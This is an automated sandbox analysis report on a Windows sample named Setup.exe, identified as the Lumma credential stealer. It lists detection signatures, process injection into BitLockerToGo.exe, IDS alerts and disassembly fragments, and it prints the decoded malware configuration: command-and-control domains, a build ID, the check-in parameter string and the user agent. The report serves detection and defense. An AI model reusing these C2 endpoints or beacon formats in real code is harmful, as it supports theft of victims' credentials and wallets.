
Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1532358
MD5: 05443b11c90686db9e945c7b5db2083f
SHA1: 4d06a81a31d2a24acf23aebc669e36ab43198c83
SHA256: 941bc1cae6bd0f033e560e2312324653586dbe7d84bb231e89c479501ab3419d
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain checking for user administrative privileges
Injects a PE file into a foreign processes
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

  • System is w10x64
  • Setup.exe (PID: 6712 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 05443B11C90686DB9E945C7B5DB2083F)
    • BitLockerToGo.exe (PID: 3784 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["condifendteu.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "divewanntwj.biz", "drawwyobstacw.sbs", "enlargkiw.sbs", "resinedyw.sbs", "mathcucom.sbs"], "Build id": "k99eRC--davi"}
Source | Rule | Description | Author | Strings
00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | 0x0:$x1: 4d5a9000030000000
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
    No Sigma rule has matched
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-13T01:43:19.559555+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49763 | 188.114.97.3 | 443 | TCP
    2024-10-13T01:43:20.532951+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | TCP
    2024-10-13T01:43:21.763103+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49780 | 104.21.33.249 | 443 | TCP
    2024-10-13T01:43:22.729015+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49790 | 104.21.77.78 | 443 | TCP
    2024-10-13T01:43:23.697513+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49799 | 172.67.140.193 | 443 | TCP
    2024-10-13T01:43:24.691670+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49806 | 172.67.173.224 | 443 | TCP
    2024-10-13T01:43:25.704366+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49813 | 104.21.79.35 | 443 | TCP
    2024-10-13T01:43:27.364361+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49819 | 188.114.96.3 | 443 | TCP
    2024-10-13T01:43:29.470690+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49837 | 172.67.206.204 | 443 | TCP
    2024-10-13T01:43:30.773465+0200 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49843 | 172.67.206.204 | 443 | TCP
    2024-10-13T01:43:19.559555+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49763 | 188.114.97.3 | 443 | TCP
    2024-10-13T01:43:20.532951+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | TCP
    2024-10-13T01:43:21.763103+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49780 | 104.21.33.249 | 443 | TCP
    2024-10-13T01:43:22.729015+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49790 | 104.21.77.78 | 443 | TCP
    2024-10-13T01:43:23.697513+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49799 | 172.67.140.193 | 443 | TCP
    2024-10-13T01:43:24.691670+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49806 | 172.67.173.224 | 443 | TCP
    2024-10-13T01:43:25.704366+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49813 | 104.21.79.35 | 443 | TCP
    2024-10-13T01:43:27.364361+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49819 | 188.114.96.3 | 443 | TCP
    2024-10-13T01:43:29.470690+0200 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49837 | 172.67.206.204 | 443 | TCP
    2024-10-13T01:43:30.773465+0200 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49843 | 172.67.206.204 | 443 | TCP
    2024-10-13T01:43:25.212994+0200 | 2056559 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49813 | 104.21.79.35 | 443 | TCP
    2024-10-13T01:43:26.203356+0200 | 2056557 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49819 | 188.114.96.3 | 443 | TCP
    2024-10-13T01:43:24.244298+0200 | 2056561 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49806 | 172.67.173.224 | 443 | TCP
    2024-10-13T01:43:21.104176+0200 | 2056567 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49780 | 104.21.33.249 | 443 | TCP
    2024-10-13T01:43:20.068526+0200 | 2056571 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49774 | 188.114.97.3 | 443 | TCP
    2024-10-13T01:43:22.294217+0200 | 2056565 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49790 | 104.21.77.78 | 443 | TCP
    2024-10-13T01:43:23.264268+0200 | 2056563 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49799 | 172.67.140.193 | 443 | TCP
    2024-10-13T01:43:20.535905+0200 | 2056568 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 56776 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:24.703292+0200 | 2056558 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54019 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:25.707038+0200 | 2056556 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 54466 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:23.699707+0200 | 2056560 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63862 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:20.583271+0200 | 2056566 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 55186 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:19.566415+0200 | 2056570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 65205 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:21.793998+0200 | 2056564 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 63346 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:22.766633+0200 | 2056562 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 52725 | 1.1.1.1 | 53 | UDP
    2024-10-13T01:43:28.675668+0200 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6 | 49826 | 104.102.49.254 | 443 | TCP


    AV Detection

    Source: https://steamcommunity.com/profiles/76561199724331900 | URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ | URL Reputation: Label: malware
    Source: 2.2.BitLockerToGo.exe.400000.0.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["condifendteu.sbs", "allocatinow.sbs", "ehticsprocw.sbs", "vennurviot.sbs", "divewanntwj.biz", "drawwyobstacw.sbs", "enlargkiw.sbs", "resinedyw.sbs", "mathcucom.sbs"], "Build id": "k99eRC--davi"}
    Source: Setup.exe | ReversingLabs: Detection: 15%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: drawwyobstacw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: condifendteu.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: ehticsprocw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: vennurviot.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: resinedyw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: enlargkiw.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: allocatinow.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: mathcucom.sbs
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: divewanntwj.biz
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
    Source: 00000000.00000002.2281733359.0000000004215000.00000004.00001000.00020000.00000000.sdmp | String decryptor: k99eRC--davi
    Source: Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49763 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49774 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49780 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49799 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49806 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49813 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49819 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49826 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49837 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49843 version: TLS 1.2
    Source: Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: BitLockerToGo.pdb source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup.exe, 00000000.00000002.2279698242.0000000003E98000.00000004.00001000.00020000.00000000.sdmp
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 2_2_004438E4
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [ebp+esi-1Eh] | 2_2_004439B5
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-2D586584h] | 2_2_0043CCC5
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp edi | 2_2_00443D4F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Dh] | 2_2_0040CE60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h | 2_2_0042E049
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea edi, dword ptr [esp+04h] | 2_2_0042E049
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov esi, dword ptr [esp+18h] | 2_2_00401000
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1Eh] | 2_2_0040F0C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then push eax | 2_2_004430D0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0042E0D7
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h | 2_2_004410E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5715E8D1h] | 2_2_004410E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [esi+ecx-43CF5BD5h] | 2_2_004320A3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [edi], dl | 2_2_00430120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov byte ptr [edi], cl | 2_2_00430120
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov dword ptr [esp], 00000000h | 2_2_0041E180
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then push 2CCA4B49h | 2_2_0040E244
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], dx | 2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ecx, ebx | 2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [edi+eax-17h] | 2_2_004252E2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_0042C2EE
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_0042F2F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h | 2_2_004452A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_004452A0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h | 2_2_00427350
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, ecx | 2_2_00429370
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, dword ptr [esp+38h] | 2_2_00429370
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 87573896h | 2_2_004463E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h | 2_2_004453F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_004453F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [ebx+eax], 00000000h | 2_2_0041E4E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h | 2_2_0042B500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C85F7986h | 2_2_0042B500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edx, ecx | 2_2_00429500
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-3643ABD5h] | 2_2_0042D530
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h | 2_2_004405F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h | 2_2_004455B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_004455B0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_0041E670
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edx, byte ptr [esi+ebx] | 2_2_004056F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h | 2_2_00440750
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov edi, ecx | 2_2_00410772
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h | 2_2_00445700
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_00445700
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_0042E7C2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_004207E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h | 2_2_004457F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_004457F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [ecx] | 2_2_0040F819
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then mov eax, ebx | 2_2_0040F819
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+14h] | 2_2_0040D8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [esp+ebx+04h] | 2_2_0040D8C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-73239D8Bh] | 2_2_0042B8F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_004398F0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp eax | 2_2_004108A8
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_0042F900
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then push esi | 2_2_0042C913
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+74h] | 2_2_00432992
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp word ptr [esi+ecx+02h], 0000h | 2_2_00421A60
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h | 2_2_00440AA0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp byte ptr [edi+ecx], 00000000h | 2_2_00445B20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_00445B20
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp dword ptr [0044EF6Ch] | 2_2_0042CBDC
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 2_2_00406B90
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_0042CC28
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [ecx+edi*8], FFFF4170h | 2_2_00446C30
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+312BE668h] | 2_2_00440CC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh | 2_2_00440CC0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then lea eax, dword ptr [esp+48h] | 2_2_0042AD00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then jmp ecx | 2_2_00445E70
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 2_2_0043EE00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 53F09CFAh | 2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h | 2_2_0041EE2E
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], C59B8BCBh | 2_2_00446F00
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 4x nop then movzx ebp, word ptr [eax] | 2_2_00446F00

    Networking

    Source: Network traffic | Suricata IDS: 2056567 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (enlargkiw .sbs in TLS SNI) : 192.168.2.6:49780 -> 104.21.33.249:443
    Source: Network traffic | Suricata IDS: 2056565 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (resinedyw .sbs in TLS SNI) : 192.168.2.6:49790 -> 104.21.77.78:443
    Source: Network traffic | Suricata IDS: 2056571 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (mathcucom .sbs in TLS SNI) : 192.168.2.6:49774 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.6:65205 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.6:63862 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056561 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ehticsprocw .sbs in TLS SNI) : 192.168.2.6:49806 -> 172.67.173.224:443
    Source: Network traffic | Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.6:63346 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056559 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (condifendteu .sbs in TLS SNI) : 192.168.2.6:49813 -> 104.21.79.35:443
    Source: Network traffic | Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.6:55186 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.6:54466 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.6:56776 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.6:52725 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.6:54019 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056557 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawwyobstacw .sbs in TLS SNI) : 192.168.2.6:49819 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2056563 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (vennurviot .sbs in TLS SNI) : 192.168.2.6:49799 -> 172.67.140.193:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49763 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49763 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49774 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49774 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49780 -> 104.21.33.249:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49780 -> 104.21.33.249:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49819 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49819 -> 188.114.96.3:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49837 -> 172.67.206.204:443
